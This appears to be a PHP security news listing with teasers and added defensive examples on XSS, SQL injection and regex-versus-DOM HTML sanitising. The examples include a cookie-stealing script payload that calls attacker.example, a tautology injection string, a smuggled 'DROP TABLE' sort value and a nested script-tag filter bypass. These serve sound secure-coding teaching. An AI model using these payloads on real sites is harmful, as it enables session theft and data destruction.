Upcoming News » Security
Secure Input is a PHP class that lets you secure your PHP application with a single function call.
It builds on the PHPIDS input filter classes. It also helps to secure your forms with unique tokens, and it provides a session_start wrapper that checks who owns the session.
You can find some documentation on Outweb.
Read More
Yeah, you read that right.
Kids, don’t try this sort of security in your own web apps. This is reserved for high-end financial institutions only.
Read More
First post of a series discussing, from a security standpoint, the various ways of including remote PHP code in your application. This post covers the history of remote code execution vulnerabilities in PHP apps and ways to prevent them.
Read More
Cross-Site Scripting (XSS) is a type of attack in which an attacker injects client-side script into a webpage that other users can view. The attack could be as simple as an annoying alert window or as sophisticated as stealing a logged-in user's credentials (commonly saved in browser cookies). With a user's credentials, an attacker could gain access to sensitive parts of your website or
Read More
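The reflected case described above, as an added example that is not code from the post: a page that echoes a query parameter straight into HTML, next to the same page with output encoding, plus the HttpOnly cookie flag that limits the cookie-theft outcome the teaser mentions. The page, the `name` parameter, the helper names and the payload are constructed for illustration.

```php
<?php
// Added example, not code from the post. Page, parameter and payload are
// constructed; run with `php xss.php`.

// Vulnerable: untrusted input is concatenated straight into HTML, so a value
// such as <script>...</script> becomes executable markup in every viewer's browser.
function renderGreetingVulnerable(string $name): string
{
    return '<p>Hello, ' . $name . '!</p>';
}

// Hardened: encode for the HTML text context at the point of output.
// ENT_QUOTES also encodes ' and " so the same helper is safe inside quoted
// attribute values; ENT_SUBSTITUTE keeps malformed UTF-8 from aborting the
// escape and silently returning an empty string.
function escapeHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function renderGreetingSafe(string $name): string
{
    return '<p>Hello, ' . escapeHtml($name) . '!</p>';
}

// Defence in depth for the cookie-theft case: with HttpOnly the session id is
// never visible to document.cookie, so a script that does get injected cannot
// read it. The array form of session_set_cookie_params needs PHP >= 7.3 and
// must be called before session_start().
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,
    'samesite' => 'Lax',
]);

// Constructed attacker input, as it would arrive in $_GET['name'].
$payload = '<script>document.location="http://attacker.example/?c="+document.cookie</script>';

echo "Vulnerable output:\n", renderGreetingVulnerable($payload), "\n\n";
echo "Hardened output:\n", renderGreetingSafe($payload), "\n";

// Regression check: no raw tag may survive the hardened renderer.
if (stripos(renderGreetingSafe($payload), '<script') !== false) {
    throw new RuntimeException('output encoding failed');
}
```

Encoding is context-specific: `htmlspecialchars` is right for HTML text and quoted attribute values, but a value placed inside a `<script>` block, a URL, or a CSS property needs the encoder for that context instead.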
There are many ways to handle passwords in your application, and a lot of different thoughts on it. You want to make sure your users are protected, but you also want to make sure that you are able to easily work with the data through the application. Here is how I handle passwords...
Read More
One of the issues web developers face is making their applications robust against SQL injection attacks. Different approaches exist that help. Sometimes people use large abstraction layers (which, sometimes, don't make anything safe ...) and sometimes people use prepared statements as a way to secure queries. Now prepared statements were a nice invention some 30 years ago but they weren't mea
Read More
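The concatenation-versus-prepared-statement contrast from the teaser above, as an added example that is not the author's code: an in-memory SQLite database through PDO, a query built by string concatenation, the parameterised version, and the one place where parameters cannot help (identifiers such as a sort column), which needs an allowlist. The `users` table, the function names and the attacker string are constructed.

```php
<?php
// Added example, not the author's code. Schema, rows, function names and the
// attacker input are constructed; run with `php sqli.php` (needs pdo_sqlite).

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT NOT NULL, password_hash TEXT NOT NULL)');
$db->exec("INSERT INTO users (username, password_hash) VALUES ('alice', 'hash-a'), ('bob', 'hash-b')");

// Vulnerable: the untrusted value becomes part of the SQL text, so the
// database cannot tell where the query ends and the data begins.
function findUserVulnerable(PDO $db, string $username): array
{
    $sql = "SELECT id, username FROM users WHERE username = '" . $username . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Fixed: the SQL text is constant; the value travels separately as a parameter
// and can never change the structure of the statement.
function findUserSafe(PDO $db, string $username): array
{
    $stmt = $db->prepare('SELECT id, username FROM users WHERE username = :u');
    $stmt->execute([':u' => $username]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Caveat: parameters only cover values. Identifiers (a column in ORDER BY, a
// table name) cannot be bound, so they must be checked against an allowlist
// before they are spliced into the query text.
function listUsersSorted(PDO $db, string $sortBy): array
{
    $allowed = ['id', 'username'];
    if (!in_array($sortBy, $allowed, true)) {
        throw new InvalidArgumentException('unsupported sort column: ' . $sortBy);
    }
    return $db->query("SELECT id, username FROM users ORDER BY $sortBy")->fetchAll(PDO::FETCH_ASSOC);
}

$payload = "' OR '1'='1";   // constructed attacker input

echo 'Concatenated query returned ', count(findUserVulnerable($db, $payload)), " row(s)\n";
echo 'Prepared statement returned ', count(findUserSafe($db, $payload)), " row(s)\n";

try {
    listUsersSorted($db, 'id; DROP TABLE users');
} catch (InvalidArgumentException $e) {
    echo 'Sort column rejected: ', $e->getMessage(), "\n";
}

// Regression check: the concatenated query leaks the whole table, the
// prepared one finds no such user.
if (count(findUserVulnerable($db, $payload)) !== 2 || count(findUserSafe($db, $payload)) !== 0) {
    throw new RuntimeException('unexpected result');
}
```

With the MySQL driver, also set `PDO::ATTR_EMULATE_PREPARES` to `false` so that the server, rather than the client library, separates the statement from its parameters.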
This weekend we had a hackday on PHPCR. The goal was to coordinate the efforts of Midgard to implement PHPCR with the Jackalope project. We ended up doing a few important cleanups to the PHPCR API definition (see below). We had Henri and Eero from the Midgard project, Benjamin from the Doctrine project and Jordi, Lukas, Chregu and myself (David) from Liip. On the second day, Uwe, Johannes and Da
Read More
As many of my readers know, I have a keen dislike for regular expression based HTML sanitisation. Regular expressions simply do not understand HTML’s nested nature and the numerous possible HTML/CSS standards it must abide by. The result is that far too many developers try to program this understanding (and unfortunately their lack of comprehensive understanding) into home grown sanitisers using
Read More
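The point above, as an added example that is not the author's code: a regex-based `<script>` stripper, an input whose nested tags survive it, and an allowlist built on DOMDocument that reduces anything unknown to plain text instead of trying to pattern-match markup. The allowed tags and attributes, the function names and the payload are constructed.

```php
<?php
// Added example, not the author's code. Allowed tags/attributes and the
// payload are constructed; run with `php sanitise.php` (needs ext/dom).

// Home-grown sanitiser: delete <script>...</script> blocks with a regex.
function regexStripScripts(string $html): string
{
    return preg_replace('#<script\b[^>]*>.*?</script>#is', '', $html);
}

// Parser-based allowlist: build a tree, reduce every element that is not
// allowed to its text, drop every attribute that is not allowed, serialise.
function domAllowlist(string $html, array $allowedTags, array $allowedAttrs): string
{
    $doc  = new DOMDocument();
    $prev = libxml_use_internal_errors(true);   // malformed input is expected here
    $doc->loadHTML('<?xml encoding="utf-8"?><body>' . $html . '</body>');
    libxml_use_internal_errors($prev);

    $body = $doc->getElementsByTagName('body')->item(0);
    if ($body === null) {
        return '';
    }
    pruneNode($body, $allowedTags, $allowedAttrs);

    $out = '';
    foreach ($body->childNodes as $child) {
        $out .= $doc->saveHTML($child);   // the serialiser escapes < and & in text nodes
    }
    return $out;
}

function pruneNode(DOMNode $node, array $allowedTags, array $allowedAttrs): void
{
    // Copy the list first: the tree is modified while we walk it.
    foreach (iterator_to_array($node->childNodes) as $child) {
        if ($child instanceof DOMElement) {
            if (!in_array(strtolower($child->tagName), $allowedTags, true)) {
                // Unknown element: keep its text, drop its markup entirely.
                $node->replaceChild($node->ownerDocument->createTextNode($child->textContent), $child);
                continue;
            }
            foreach (iterator_to_array($child->attributes) as $attr) {
                $name       = strtolower($attr->name);
                $unsafeHref = ($name === 'href' && !preg_match('#^https?://#i', $attr->value));
                if (!in_array($name, $allowedAttrs, true) || $unsafeHref) {
                    $child->removeAttribute($attr->name);   // drops on*= handlers and javascript: URLs
                }
            }
            pruneNode($child, $allowedTags, $allowedAttrs);
        } elseif (!($child instanceof DOMText)) {
            $node->removeChild($child);   // comments, processing instructions
        }
    }
}

function containsScriptTag(string $html): bool
{
    return stripos($html, '<script') !== false;
}

// Constructed payload: the regex removes each inner <script></script>, and the
// halves it leaves behind join up into a real <script> tag.
$payload = '<scr<script></script>ipt>alert(1)</scr<script></script>ipt>'
         . '<a href="javascript:alert(2)" onclick="x()">link</a>';

$viaRegex = regexStripScripts($payload);
$viaDom   = domAllowlist($payload, ['p', 'b', 'i', 'a'], ['href']);

echo "regex : ", $viaRegex, "\n";
echo "dom   : ", $viaDom, "\n";

// The regex output contains a live <script>; the DOM output cannot, because
// every element not on the allowlist was turned into escaped text.
if (!containsScriptTag($viaRegex) || containsScriptTag($viaDom)) {
    throw new RuntimeException('unexpected result');
}
```

The DOM version never emits markup it did not itself decide to keep, which is the property a blacklist regex cannot offer: the regex has to anticipate every way the parser will reassemble what is left after a deletion.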
OTN has published two articles by Eli White that stem from his long experience with protecting high volume websites from unwanted and malicious use. Eli has worked on many large scale PHP projects including Digg, TripAdvisor, and for the Hubble...
Read More
I wanted to write something more useful today but instead I chose to waste a few hours on upgrading my current Symfony2 project to PR9 coming from PR7, effectively breaking it.
Read More
Hi, I am Lucas Carlson, founder and CEO of PHP Fog and the guy who hasn’t slept in almost 4 days. This is my story.
Read More
7 security measures to take to keep PHPMyAdmin from being hacked.
Read More
Maintainers of the PHP programming language spent the past few days scouring their source code for malicious modifications after discovering the security of one of their servers had been breached.
Read More
There are many ways to handle security in a web application, and many things to think about. This is by no means an in-depth look on application security. It is meant to be an overview of how to use the security features included in FuelPHP.
Read More
Zend_Http_Client_Adapter_Socket, and the stream_copy_to_stream call it uses, may run into an infinite loop on some hosts with old PHP 5.2.x. Find out how to work around the problem.
Read More